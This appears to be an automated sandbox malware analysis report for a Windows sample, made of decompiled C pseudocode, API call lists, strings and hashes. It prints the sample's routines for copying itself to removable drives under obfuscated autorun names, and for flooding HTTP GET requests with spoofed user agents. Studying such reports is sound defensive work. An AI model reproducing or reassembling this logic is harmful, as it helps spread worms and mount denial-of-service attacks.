                                                                          0x00406a93
                                                                          0x00406a9d
                                                                          0x00406aa7
                                                                          0x00406ab1
                                                                          0x00406ab8
                                                                          0x00406abd
                                                                          0x00406abf
                                                                          0x00406ac5
                                                                          0x00406ac8
                                                                          0x00406ad1
                                                                          0x00406ada
                                                                          0x00406ae3
                                                                          0x00406ae9
                                                                          0x00406af4
                                                                          0x00406af8
                                                                          0x00406afc
                                                                          0x00406b04
                                                                          0x00406b0a
                                                                          0x00406b0d
                                                                          0x00406b14
                                                                          0x00406b1c
                                                                          0x00406b21
                                                                          0x00406b27
                                                                          0x00406b2c
                                                                          0x00406b2e
                                                                          0x00406b41
                                                                          0x00406b46
                                                                          0x00406b4b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406b4f
                                                                          0x00406b57
                                                                          0x00406b5c
                                                                          0x00406b64
                                                                          0x00406b68
                                                                          0x00406b6c
                                                                          0x00406b6f
                                                                          0x00406b74
                                                                          0x00406b77
                                                                          0x00406b7a
                                                                          0x00406b7f
                                                                          0x00406b88
                                                                          0x00406b8b
                                                                          0x00406b90
                                                                          0x00406b90
                                                                          0x00406ba1

                                                                          APIs
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • wsprintfA.USER32 ref: 00406B0D
                                                                            • Part of subcall function 00405434: WSASocketA.WS2_32 ref: 0040546A
                                                                            • Part of subcall function 00405434: htons.WS2_32 ref: 00405485
                                                                            • Part of subcall function 00405434: WSAConnect.WS2_32 ref: 004054D7
                                                                          • send.WS2_32 ref: 00406B6F
                                                                          • closesocket.WS2_32 ref: 00406B7A
                                                                          • Sleep.KERNEL32 ref: 00406B8B
                                                                          Strings
                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 00406A57
                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon), xrefs: 00406A61
                                                                          • GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*, xrefs: 00406AFC
                                                                          • Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1, xrefs: 00406A7F
                                                                          • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;), xrefs: 00406A93
                                                                          • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1), xrefs: 00406A89
                                                                          • Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0), xrefs: 00406A9D
                                                                          • Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729), xrefs: 00406A6B
                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322), xrefs: 00406A75
                                                                          • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0), xrefs: 00406AA7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectCountSleepSocketTickclosesockethtonsrandsendsrandwsprintf
                                                                          • String ID: GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*$Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)$Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)$Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1
                                                                          • API String ID: 336679807-801071570
                                                                          • Opcode ID: e53b55a620a33dde3b4b694c48138350b48f0f36ad9310f433b1ee46dc230097
                                                                          • Instruction ID: 5cdc0710ae53c098c5dd65590a42bc470b49e3f5e350015ac0ed1cf0fb49e237
                                                                          • Opcode Fuzzy Hash: e53b55a620a33dde3b4b694c48138350b48f0f36ad9310f433b1ee46dc230097
                                                                          • Instruction Fuzzy Hash: D83141F49047148BCB20DF29C58428DBBF0EF85314F1085AEE558AB392D7789A95CF5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 43%
                                                                          			E004068A0() {
                                                                          				void* _v16;
                                                                          				char _v188;
                                                                          				char _v220;
                                                                          				char _v348;
                                                                          				char _v349;
                                                                          				char _v380;
                                                                          				void _v476;
                                                                          				intOrPtr _v484;
                                                                          				int _v488;
                                                                          				void* _v492;
                                                                          				int _t40;
                                                                          				CHAR* _t42;
                                                                          				void* _t47;
                                                                          				signed int _t49;
                                                                          				void* _t50;
                                                                          				void* _t51;
                                                                          				void* _t52;
                                                                          				void* _t53;
                                                                          				void* _t54;
                                                                          				void** _t55;
                                                                          				intOrPtr* _t56;
                                                                          
                                                                          				memcpy( &_v476, 0x40d460, 0x60);
                                                                          				E00404C38( &_v380, "nhgbeha.vas");
                                                                          				_v488 = "fngbeanf.qyy";
                                                                          				_t47 =  &_v220;
                                                                          				_v492 = _t47;
                                                                          				E00404C38();
                                                                          				_v484 = _t47;
                                                                          				_v488 = 0x96;
                                                                          				_v492 =  &_v188;
                                                                          				E00404620();
                                                                          				if(E00404ED6( &_v188) != 0) {
                                                                          					_t50 =  &_v348;
                                                                          					while(1) {
                                                                          						Sleep(0x1770);
                                                                          						_t54 = _t53 - 4;
                                                                          						_t49 = 0;
                                                                          						do {
                                                                          							_t40 = GetDriveTypeA( *(_t52 + _t49 * 4 - 0x1d8));
                                                                          							_t54 = _t54 - 4;
                                                                          							if(_t40 == 2) {
                                                                          								_t51 =  &_v348;
                                                                          								memset(_t51, 0, 0x78);
                                                                          								_t42 =  *(_t52 + _t49 * 4 - 0x1d8);
                                                                          								_v488 = _t42;
                                                                          								_v492 = _t51;
                                                                          								L0040C208();
                                                                          								_v492 = _t51;
                                                                          								L0040C310();
                                                                          								_t55 = _t54 - 4;
                                                                          								if(_t42[(char*)( &_v349)] != 0x5c) {
                                                                          									_v492 = 0x412935;
                                                                          									 *_t55 = _t51;
                                                                          									L0040C328();
                                                                          									_t55 = _t55 - 8;
                                                                          								}
                                                                          								_v492 =  &_v380;
                                                                          								 *_t55 = _t50;
                                                                          								L0040C208();
                                                                          								 *_t55 = 1;
                                                                          								SetErrorMode(??);
                                                                          								_t56 = _t55 - 4;
                                                                          								_v488 = 0;
                                                                          								_v492 = _t50;
                                                                          								 *_t56 =  &_v188;
                                                                          								CopyFileA(??, ??, ??);
                                                                          								_t54 = _t56 - 0xc;
                                                                          							}
                                                                          							_t49 = 1 + _t49;
                                                                          						} while (_t49 <= 0x17);
                                                                          					}
                                                                          				}
                                                                          				return 0;
                                                                          			}
























                                                                          0x004068c5
                                                                          0x004068db
                                                                          0x004068e0
                                                                          0x004068e8
                                                                          0x004068ee
                                                                          0x004068f1
                                                                          0x004068f6
                                                                          0x004068fa
                                                                          0x00406908
                                                                          0x0040690b
                                                                          0x0040691a
                                                                          0x00406920
                                                                          0x00406926
                                                                          0x0040692d
                                                                          0x00406932
                                                                          0x00406935
                                                                          0x0040693a
                                                                          0x00406944
                                                                          0x00406949
                                                                          0x0040694f
                                                                          0x00406955
                                                                          0x0040696e
                                                                          0x00406973
                                                                          0x0040697a
                                                                          0x0040697e
                                                                          0x00406981
                                                                          0x00406986
                                                                          0x00406989
                                                                          0x0040698e
                                                                          0x00406999
                                                                          0x0040699b
                                                                          0x004069a3
                                                                          0x004069a6
                                                                          0x004069ab
                                                                          0x004069ab
                                                                          0x004069b4
                                                                          0x004069b8
                                                                          0x004069bb
                                                                          0x004069c0
                                                                          0x004069c7
                                                                          0x004069cc
                                                                          0x004069cf
                                                                          0x004069d7
                                                                          0x004069e1
                                                                          0x004069e4
                                                                          0x004069e9
                                                                          0x004069e9
                                                                          0x004069ec
                                                                          0x004069ed
                                                                          0x004069f6
                                                                          0x00406926
                                                                          0x00406a07

                                                                          APIs
                                                                          • memcpy.MSVCRT ref: 004068C5
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                            • Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
                                                                            • Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB
                                                                          • Sleep.KERNEL32 ref: 0040692D
                                                                          • GetDriveTypeA.KERNEL32 ref: 00406944
                                                                          • memset.MSVCRT ref: 0040696E
                                                                          • _mbscat.MSVCRT ref: 00406981
                                                                          • lstrlen.KERNEL32 ref: 00406989
                                                                          • lstrcat.KERNEL32 ref: 004069A6
                                                                          • _mbscat.MSVCRT ref: 004069BB
                                                                          • SetErrorMode.KERNEL32 ref: 004069C7
                                                                          • CopyFileA.KERNEL32 ref: 004069E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$_mbscatlstrlenmemset$CopyDirectoryDriveErrorFileModeSleepSystemTypefclosefopenmemcpy
                                                                          • String ID: fngbeanf.qyy$nhgbeha.vas$x
                                                                          • API String ID: 1674407683-3747760128
                                                                          • Opcode ID: 84151a140f1e5fa0085d5774543a83b656e69c0a109d3cbe9b508c1ff952e0c4
                                                                          • Instruction ID: ef6cf4129608155cc112f4a97fe144a2978ba8a5c429c4c3aaf2c51783ef7b88
                                                                          • Opcode Fuzzy Hash: 84151a140f1e5fa0085d5774543a83b656e69c0a109d3cbe9b508c1ff952e0c4
                                                                          • Instruction Fuzzy Hash: 01313BB0808704DAD710BF65D58539EBBF4AF84318F41897EE8C867282D77C9598CB9B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseHandle$Create$MappingSizeView
                                                                          • String ID:
                                                                          • API String ID: 3733816638-0
                                                                          • Opcode ID: 64beccc6f6e1811926c309a9acaa175bb040272e9c324b493b73e6d9ca74493c
                                                                          • Instruction ID: 986d351c7ed07d29ba8de43e54e9a7d5c311c5fefbca7bada34d70547d36c5f0
                                                                          • Opcode Fuzzy Hash: 64beccc6f6e1811926c309a9acaa175bb040272e9c324b493b73e6d9ca74493c
                                                                          • Instruction Fuzzy Hash: 0F513FB59043059BDB10AF25C99535EBFF4AF81348F1089AEE488673C1D779DA88CB87
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
                                                                          • String ID: Fbsgjner\Xnmnn\Genafsre$QyQve0
                                                                          • API String ID: 3255004976-3635034446
                                                                          • Opcode ID: 77ff702613bd2978c6546c697ad05210d843fe780aaedd06882f4884a381cac5
                                                                          • Instruction ID: afcb269cad9b4d3002b0b3817e33f6dff803cc776bda76573fbb9b1efc1f5d05
                                                                          • Opcode Fuzzy Hash: 77ff702613bd2978c6546c697ad05210d843fe780aaedd06882f4884a381cac5
                                                                          • Instruction Fuzzy Hash: 0751FBB4D05718DBDB50EF24C58939EBBF0AF44304F4189BED88867381D7789A888F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
                                                                          • String ID: Fbsgjner\vZrfu\Trareny$QbjaybnqQve
                                                                          • API String ID: 3255004976-427315093
                                                                          • Opcode ID: f4dee5593495d302061cee7d5c0959bbdce22457aa1a021a13ccdf22a674c199
                                                                          • Instruction ID: 4c2f52c761e00ed0f591be26c1bd4671a41acc1e7387a317ba9ae8b83013203e
                                                                          • Opcode Fuzzy Hash: f4dee5593495d302061cee7d5c0959bbdce22457aa1a021a13ccdf22a674c199
                                                                          • Instruction Fuzzy Hash: D051FCB4905718CEDB60EF24C58939EBBF4AF44304F4185BEDC8867381D7789A888F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 19%
                                                                          			E004017F8(signed int __edx, CHAR* _a4, intOrPtr* _a8) {
                                                                          				void* _v16;
                                                                          				DWORD* _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				void* _v36;
                                                                          				void* _v40;
                                                                          				void* _v44;
                                                                          				void* _v48;
                                                                          				signed int _v52;
                                                                          				DWORD* _v56;
                                                                          				signed int _v60;
                                                                          				DWORD* _v64;
                                                                          				signed int _t50;
                                                                          				void* _t54;
                                                                          				void* _t55;
                                                                          				int _t58;
                                                                          				DWORD* _t62;
                                                                          				void* _t65;
                                                                          				void* _t68;
                                                                          				DWORD* _t73;
                                                                          				signed int _t74;
                                                                          				void* _t86;
                                                                          				DWORD* _t88;
                                                                          				void* _t89;
                                                                          				void* _t90;
                                                                          				void** _t92;
                                                                          				void** _t93;
                                                                          				void** _t94;
                                                                          
                                                                          				_t74 = __edx;
                                                                          				_v20 = 0;
                                                                          				_t50 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0xa7, 0);
                                                                          				_t90 = _t89 - 0x1c;
                                                                          				_t86 = _t50;
                                                                          				_t73 = 0;
                                                                          				if((_t74 & 0xffffff00 | _t50 == 0xffffffff | _t50 & 0xffffff00 | _t50 == 0x00000000) == 0) {
                                                                          					_v24 = GetFileSize(_t86, 0);
                                                                          					_t54 = GetProcessHeap();
                                                                          					_v52 = _v24;
                                                                          					_v56 = 0;
                                                                          					_t55 = RtlAllocateHeap(_t54);
                                                                          					_t92 = _t90 - 0xfffffffffffffffc;
                                                                          					_v28 = _t55;
                                                                          					if(_t55 != 0) {
                                                                          						_v52 = 0;
                                                                          						_v56 =  &_v20;
                                                                          						_v60 = _v24;
                                                                          						_v64 = _v28;
                                                                          						 *_t92 = _t86;
                                                                          						_t58 = ReadFile(??, ??, ??, ??, ??);
                                                                          						_t93 = _t92 - 0x14;
                                                                          						if(_t58 != 0) {
                                                                          							_t88 = 1 + ((0xb + _v24 * 4) * 0xaaaaaaab >> 0x20 >> 3) * 4;
                                                                          							_v64 = _t88;
                                                                          							 *_t93 = 0x40;
                                                                          							_t62 = GlobalAlloc(??, ??);
                                                                          							_t94 = _t93 - 8;
                                                                          							_v56 = _t88;
                                                                          							_v60 = _t62;
                                                                          							_v64 = _v24;
                                                                          							 *_t94 = _v28;
                                                                          							 *_a8 = E00401996(_v28, _v24);
                                                                          							_t65 = GetProcessHeap();
                                                                          							_v60 = _v28;
                                                                          							_v64 = 0;
                                                                          							 *_t94 = _t65;
                                                                          							HeapFree(??, ??, ??);
                                                                          							 *(_t94 - 0xc) = _t86;
                                                                          							CloseHandle(??);
                                                                          							_t73 = _t62;
                                                                          						} else {
                                                                          							_t68 = GetProcessHeap();
                                                                          							_v60 = _v28;
                                                                          							_v64 = 0;
                                                                          							 *_t93 = _t68;
                                                                          							HeapFree(??, ??, ??);
                                                                          							 *(_t93 - 0xc) = _t86;
                                                                          							CloseHandle(??);
                                                                          							_t73 = 0;
                                                                          						}
                                                                          					} else {
                                                                          						 *_t92 = _t86;
                                                                          						CloseHandle(??);
                                                                          						_t73 = 0;
                                                                          					}
                                                                          				}
                                                                          				return _t73;
                                                                          			}































                                                                          0x004017f8
                                                                          0x00401801
                                                                          0x0040183e
                                                                          0x00401843
                                                                          0x00401846
                                                                          0x00401853
                                                                          0x0040185a
                                                                          0x00401873
                                                                          0x00401876
                                                                          0x0040187e
                                                                          0x00401882
                                                                          0x0040188d
                                                                          0x00401892
                                                                          0x00401895
                                                                          0x0040189a
                                                                          0x004018b1
                                                                          0x004018bc
                                                                          0x004018c3
                                                                          0x004018ca
                                                                          0x004018ce
                                                                          0x004018d1
                                                                          0x004018d6
                                                                          0x004018db
                                                                          0x00401924
                                                                          0x0040192b
                                                                          0x0040192f
                                                                          0x00401936
                                                                          0x0040193b
                                                                          0x00401940
                                                                          0x00401944
                                                                          0x0040194b
                                                                          0x00401952
                                                                          0x0040195d
                                                                          0x0040195f
                                                                          0x00401967
                                                                          0x0040196b
                                                                          0x00401973
                                                                          0x00401976
                                                                          0x0040197e
                                                                          0x00401981
                                                                          0x00401989
                                                                          0x004018dd
                                                                          0x004018dd
                                                                          0x004018e5
                                                                          0x004018e9
                                                                          0x004018f1
                                                                          0x004018f4
                                                                          0x004018fc
                                                                          0x004018ff
                                                                          0x00401907
                                                                          0x00401907
                                                                          0x0040189c
                                                                          0x0040189c
                                                                          0x0040189f
                                                                          0x004018a7
                                                                          0x004018a7
                                                                          0x0040189a
                                                                          0x00401994

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$File$CloseHandleProcess$AllocateCreateFreeReadSize
                                                                          • String ID:
                                                                          • API String ID: 1447158257-0
                                                                          • Opcode ID: 24885dd36752065bb9067512dd52856c7f9770a372319146a230e3d3ab931db9
                                                                          • Instruction ID: 56d12447d5e111c6f88c9cc84d084cd75ca963f9ae61866c417ed6db83e02629
                                                                          • Opcode Fuzzy Hash: 24885dd36752065bb9067512dd52856c7f9770a372319146a230e3d3ab931db9
                                                                          • Instruction Fuzzy Hash: 614119B1904705DBD700EFA9C18536EBFF0AF84304F108A3EE884A7791D7799949CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32 ref: 00405531
                                                                            • Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 00404FD9
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FE1
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 00404FE9
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00404FF2
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FF9
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 00405001
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 0040500D
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405026
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 0040502E
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405033
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040504E
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 00405056
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 0040505B
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405076
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 0040507E
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405083
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040509E
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 004050A6
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004050AB
                                                                            • Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 004050C6
                                                                            • Part of subcall function 00404F82: srand.MSVCRT ref: 004050CE
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004050D3
                                                                            • Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 004050E5
                                                                            • Part of subcall function 00404F82: _itoa.MSVCRT ref: 00405102
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405107
                                                                          • SetFilePointer.KERNEL32 ref: 00405574
                                                                          • WriteFile.KERNEL32 ref: 0040559A
                                                                          • Sleep.KERNEL32 ref: 004055A9
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 0040513A
